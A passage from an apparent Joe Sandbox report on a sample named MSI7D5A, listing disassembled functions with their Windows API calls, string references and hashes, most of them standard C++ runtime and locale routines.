                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00A466D7
                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00A466E2
                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00A466FE
                                                      • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00A849E5,000000FF), ref: 00A467DB
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00A849E5,000000FF), ref: 00A467E7
                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00A849E5), ref: 00A4682F
                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,00A849E5,000000FF), ref: 00A4684A
                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00A849E5), ref: 00A46867
                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00A849E5,000000FF), ref: 00A46891
                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00A468D8
                                                      • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00A4692A
                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00A849E5,000000FF), ref: 00A4695C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                      • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                      • API String ID: 2199533872-3004881174
                                                      • Opcode ID: a7a449d370538a29801da8cab272005f7f93bc28c828b135672ac7ca8cf97b36
                                                      • Instruction ID: cec1644803fe3bc7c7793a1dc75432dbae5cb37c98773be67c573a46769a362f
                                                      • Opcode Fuzzy Hash: a7a449d370538a29801da8cab272005f7f93bc28c828b135672ac7ca8cf97b36
                                                      • Instruction Fuzzy Hash: 39B14875904249AFEF20CF64CD86BEFBBB5EF86700F204119E514AB2C1D7B09A05C7A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A62B8C Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00A9DD3C,00000FA0,?,?,00A62B6A), ref: 00A62B98
                                                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00A62B6A), ref: 00A62BA3
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00A62B6A), ref: 00A62BB4
                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00A62BC6
                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00A62BD4
                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00A62B6A), ref: 00A62BF7
                                                      • DeleteCriticalSection.KERNEL32(00A9DD3C,00000007,?,?,00A62B6A), ref: 00A62C13
                                                      • CloseHandle.KERNEL32(00000000,?,?,00A62B6A), ref: 00A62C23
                                                      Strings
                                                      • kernel32.dll, xrefs: 00A62BAF
                                                      • WakeAllConditionVariable, xrefs: 00A62BCC
                                                      • SleepConditionVariableCS, xrefs: 00A62BC0
                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00A62B9E
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                      • API String ID: 2565136772-3242537097
                                                      • Opcode ID: e525cf17705ffb879bd97a0c8ae641c60bc42c654ab614a3391764d82c8e86e3
                                                      • Instruction ID: 45fdb35eba507fe0f9443e82fb2540670b43375f27f2d09ab1de2f9616b220f3
                                                      • Opcode Fuzzy Hash: e525cf17705ffb879bd97a0c8ae641c60bc42c654ab614a3391764d82c8e86e3
                                                      • Instruction Fuzzy Hash: 11017175B46B11ABDB21AFB5AC0DB5A7B78EF90B51B200C11BD04D22A4DE78C8428761
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A65CAF Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 00A65DAC
                                                      • type_info::operator==.LIBVCRUNTIME ref: 00A65DCE
                                                      • ___TypeMatch.LIBVCRUNTIME ref: 00A65EDD
                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 00A65FAF
                                                      • _UnwindNestedFrames.LIBCMT ref: 00A66033
                                                      • CallUnexpected.LIBVCRUNTIME ref: 00A6604E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 2123188842-393685449
                                                      • Opcode ID: 55e8b9f2793f7f37cec6fdcdbdfeafdbafb7db3fbd6c0597defac4444cbc9068
                                                      • Instruction ID: 2e6673b26b175593b216e85792ad64e00ae20ce456ac8f087a30e348f7806aaf
                                                      • Opcode Fuzzy Hash: 55e8b9f2793f7f37cec6fdcdbdfeafdbafb7db3fbd6c0597defac4444cbc9068
                                                      • Instruction Fuzzy Hash: CEB17972C00619EFCF29DFA4CA819AEBBB5FF18310F14816AE8156B252D731DE51CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A44270 Relevance: 15.1, APIs: 10, Instructions: 137timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000400,00000000,?,838A949E,?,?,?), ref: 00A442D2
                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,838A949E,?,?,?), ref: 00A442F3
                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,838A949E,?,?,?), ref: 00A44326
                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,838A949E,?,?,?), ref: 00A44337
                                                      • CloseHandle.KERNEL32(00000000,?,838A949E,?,?,?), ref: 00A44355
                                                      • CloseHandle.KERNEL32(00000000,?,838A949E,?,?,?), ref: 00A44371
                                                      • CloseHandle.KERNEL32(00000000,?,838A949E,?,?,?), ref: 00A44399
                                                      • CloseHandle.KERNEL32(00000000,?,838A949E,?,?,?), ref: 00A443B5
                                                      • CloseHandle.KERNEL32(00000000,?,838A949E,?,?,?), ref: 00A443D3
                                                      • CloseHandle.KERNEL32(00000000,?,838A949E,?,?,?), ref: 00A443EF
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle$Process$OpenTimes
                                                      • String ID:
                                                      • API String ID: 1711917922-0
                                                      • Opcode ID: 47e571594699a648911c3e1f660b9ecb57afbf96c1a10c9a55327d4c274002e0
                                                      • Instruction ID: 46c67fd8f33adac7bf41e7f2355a085dd6daae32ca664d0f8baa9784a9f72e17
                                                      • Opcode Fuzzy Hash: 47e571594699a648911c3e1f660b9ecb57afbf96c1a10c9a55327d4c274002e0
                                                      • Instruction Fuzzy Hash: F6515975E01618EFDB10CF98D984BAEBBF4BF88B14F244219E524BB280C77559068BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A5BBBD Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5BBC4
                                                        • Part of subcall function 00A5254E: __EH_prolog3.LIBCMT ref: 00A52555
                                                        • Part of subcall function 00A5254E: std::_Lockit::_Lockit.LIBCPMT ref: 00A5255F
                                                        • Part of subcall function 00A5254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00A525D0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                      • API String ID: 1538362411-2891247106
                                                      • Opcode ID: ef33554fadbbd12dd4d8c5c870c6da9a3af893aa97e4f93eca331b345813a46b
                                                      • Instruction ID: b589a7b7297bd7045992fca36312dd8de92af04dde201ef76e90176c7accb711
                                                      • Opcode Fuzzy Hash: ef33554fadbbd12dd4d8c5c870c6da9a3af893aa97e4f93eca331b345813a46b
                                                      • Instruction Fuzzy Hash: 64B17D7251010AABCF19DF68CE56EFE3BB9FB18306F144119FE06A6291D731DA18DB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A60C9D Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A60CA4
                                                        • Part of subcall function 00A49270: std::_Lockit::_Lockit.LIBCPMT ref: 00A492A0
                                                        • Part of subcall function 00A49270: std::_Lockit::_Lockit.LIBCPMT ref: 00A492C2
                                                        • Part of subcall function 00A49270: std::_Lockit::~_Lockit.LIBCPMT ref: 00A492EA
                                                        • Part of subcall function 00A49270: std::_Lockit::~_Lockit.LIBCPMT ref: 00A49422
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                      • API String ID: 1383202999-2891247106
                                                      • Opcode ID: 9cc28eb088f57646b1bb90c629564b4bf78806f704136ba83829b843337ba0d6
                                                      • Instruction ID: bb6f0e23224b628d0686d98152a45b0e1f9593eb396863db59b69b06c82589b8
                                                      • Opcode Fuzzy Hash: 9cc28eb088f57646b1bb90c629564b4bf78806f704136ba83829b843337ba0d6
                                                      • Instruction Fuzzy Hash: 8DB1AD7550020AEFCF29DFA8C959DFF3BB9FB04300F154519FA06A6291D632DA90DB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A5BF7E Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00A5BF85
                                                        • Part of subcall function 00A48610: std::_Lockit::_Lockit.LIBCPMT ref: 00A48657
                                                        • Part of subcall function 00A48610: std::_Lockit::_Lockit.LIBCPMT ref: 00A48679
                                                        • Part of subcall function 00A48610: std::_Lockit::~_Lockit.LIBCPMT ref: 00A486A1
                                                        • Part of subcall function 00A48610: std::_Lockit::~_Lockit.LIBCPMT ref: 00A4880E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                      • API String ID: 1383202999-2891247106
                                                      • Opcode ID: 7ef603c18d10a93386540d0c7fe487f29bcc61dfbc771b904fd3a501327ca771
                                                      • Instruction ID: 1bd60a15ad83453099591563ea8fd535ae0fdd39906842d10c08dc58bb3eb3e1
                                                      • Opcode Fuzzy Hash: 7ef603c18d10a93386540d0c7fe487f29bcc61dfbc771b904fd3a501327ca771
                                                      • Instruction Fuzzy Hash: 78B1917250020AAFCF19EFA8C955DFE7BB9FB08361F144519FE02A725AD631CA14DB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A58555 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00A5855C
                                                      • _Maklocstr.LIBCPMT ref: 00A585C5
                                                      • _Maklocstr.LIBCPMT ref: 00A585D7
                                                      • _Maklocchr.LIBCPMT ref: 00A585EF
                                                      • _Maklocchr.LIBCPMT ref: 00A585FF
                                                      • _Getvals.LIBCPMT ref: 00A58621
                                                        • Part of subcall function 00A51CD4: _Maklocchr.LIBCPMT ref: 00A51D03
                                                        • Part of subcall function 00A51CD4: _Maklocchr.LIBCPMT ref: 00A51D19
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                      • String ID: false$true
                                                      • API String ID: 3549167292-2658103896
                                                      • Opcode ID: 8ed325e2737b3d2e4b62dfc3ba0c33f5c933f7404321b024c2f7feae39a64fce
                                                      • Instruction ID: b4eeca0e3ac6dfa310e76c9b68a18ff837399090efdda31d34aab25a39ae4fc8
                                                      • Opcode Fuzzy Hash: 8ed325e2737b3d2e4b62dfc3ba0c33f5c933f7404321b024c2f7feae39a64fce
                                                      • Instruction Fuzzy Hash: 3F2183B1D00304ABDF15EFB4D986AEE7BB8BF04711F008156BD09AF142DA708944CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A49730 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 398COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::locale::_Init.LIBCPMT ref: 00A49763
                                                        • Part of subcall function 00A50C94: __EH_prolog3.LIBCMT ref: 00A50C9B
                                                        • Part of subcall function 00A50C94: std::_Lockit::_Lockit.LIBCPMT ref: 00A50CA6
                                                        • Part of subcall function 00A50C94: std::locale::_Setgloballocale.LIBCPMT ref: 00A50CC1
                                                        • Part of subcall function 00A50C94: std::_Lockit::~_Lockit.LIBCPMT ref: 00A50D17
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00A4978A
                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00A497F0
                                                      • std::locale::_Locimp::_Makeloc.LIBCPMT ref: 00A4984A
                                                        • Part of subcall function 00A4F57A: __EH_prolog3.LIBCMT ref: 00A4F581
                                                        • Part of subcall function 00A4F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A4F5C8
                                                        • Part of subcall function 00A4F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A4F620
                                                        • Part of subcall function 00A4F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A4F654
                                                        • Part of subcall function 00A4F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00A4F6A8
                                                      • LocalFree.KERNEL32(00000000,00000000,?,00A954B1,00000000), ref: 00A499BF
                                                      • __cftoe.LIBCMT ref: 00A49B0B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: std::locale::_$Locimp::_$AddfacLocimp_std::_$Lockit$H_prolog3Lockit::_$FreeInitLocalLocinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale__cftoe
                                                      • String ID: bad locale name
                                                      • API String ID: 3103716676-1405518554
                                                      • Opcode ID: 898dc86bc5bb63b494b522555e602258547314d944bd37e8a7328e116b54a81a
                                                      • Instruction ID: e75233751ae41fe6ff7ff1ddc10b65858ddc3f712ba81e94cf1874e18f50106b
                                                      • Opcode Fuzzy Hash: 898dc86bc5bb63b494b522555e602258547314d944bd37e8a7328e116b54a81a
                                                      • Instruction Fuzzy Hash: 1BF19D75E01248DFDF10CFA8C985BAFBBB5EF49304F244169E805AB381E7359A15CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A43C20 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 225libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00A436D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00A43735
                                                        • Part of subcall function 00A436D0: _wcschr.LIBVCRUNTIME ref: 00A437C6
                                                      • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00A43CA8
                                                      • ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000,00000000,00000018,00000000), ref: 00A43D01
                                                      • ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000,?,000001D8,00000000,00000000,00000018,00000000), ref: 00A43D7A
                                                      • ReadProcessMemory.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,?,?,?,00000048,00000000,?,000001D8), ref: 00A43EB1
                                                      • GetLastError.KERNEL32 ref: 00A43F34
                                                      • FreeLibrary.KERNEL32(?), ref: 00A43F7B
                                                      Strings
                                                      • NtQueryInformationProcess, xrefs: 00A43CA2
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead$AddressDirectoryErrorFreeLastLibraryProcSystem_wcschr
                                                      • String ID: NtQueryInformationProcess
                                                      • API String ID: 566592816-2781105232
                                                      • Opcode ID: e82bd46f2c774edb054da0525e9d7e33891937fc732d29fd2cd2cf39b6270f95
                                                      • Instruction ID: 1f8ecf38dda7db975d9e222112c76cee05a1f0279216a2eccebc313fad0d189b
                                                      • Opcode Fuzzy Hash: e82bd46f2c774edb054da0525e9d7e33891937fc732d29fd2cd2cf39b6270f95
                                                      • Instruction Fuzzy Hash: 05A16871D05649DEEF20CF64CC49BAEBBF0EF48304F204599D449A7290E7B5AA88CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A440B0 Relevance: 12.2, APIs: 8, Instructions: 233memorytimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LocalAlloc.KERNEL32(00000040,40000022,838A949E,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00A44154
                                                      • LocalAlloc.KERNEL32(00000040,3FFFFFFF,838A949E,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00A44177
                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00A44217
                                                      • OpenProcess.KERNEL32(00000400,00000000,?,838A949E,?,?,?), ref: 00A442D2
                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,838A949E,?,?,?), ref: 00A442F3
                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,838A949E,?,?,?), ref: 00A44326
                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,838A949E,?,?,?), ref: 00A44337
                                                      • CloseHandle.KERNEL32(00000000,?,838A949E,?,?,?), ref: 00A44355
                                                      • CloseHandle.KERNEL32(00000000,?,838A949E,?,?,?), ref: 00A44371
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: Process$Local$AllocCloseHandleOpenTimes$Free
                                                      • String ID:
                                                      • API String ID: 1424318461-0
                                                      • Opcode ID: 3a624d123054dfdd946efae65f5941c3785dd4a556e861364c8d6a7491fc75e8
                                                      • Instruction ID: c66e10c27d2bada93e4eb8a6badbdf702048fe89b8cf502733c35adfa051f732
                                                      • Opcode Fuzzy Hash: 3a624d123054dfdd946efae65f5941c3785dd4a556e861364c8d6a7491fc75e8
                                                      • Instruction Fuzzy Hash: 52818D75E002059FDB14CFA8D985BAEBBB5FB8C710F244229E925E73D0D771A9418BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6266D Relevance: 12.2, APIs: 8, Instructions: 224COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 00A626F8
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00A62786
                                                      • __alloca_probe_16.LIBCMT ref: 00A627B0
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A627F8
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00A62812
                                                      • __alloca_probe_16.LIBCMT ref: 00A62838
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A62875
                                                      • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00A62892
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2085090627.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                      • Associated: 00000006.00000002.2085076632.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085130397.0000000000A9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000006.00000002.2085148614.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_a40000_MSI7D5A.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                      • String ID:
                                                      • API String ID: 3603178046-0
                                                      • Opcode ID: 28a765bef843c5f6c0b4f2f50003e134a6e7b86ac702d393b737ad4c75041299
                                                      • Instruction ID: 3ab0f8c9bdbb58aae10d2102bc7121413e71d24023edc64e7357702b1d6c88bd
                                                      • Opcode Fuzzy Hash: 28a765bef843c5f6c0b4f2f50003e134a6e7b86ac702d393b737ad4c75041299
                                                      • Instruction Fuzzy Hash: 2071C376900A0AAFDF218FA4CD85FEE7BB6EF45350F284119F904A7291DB31C901CB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A6215A Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
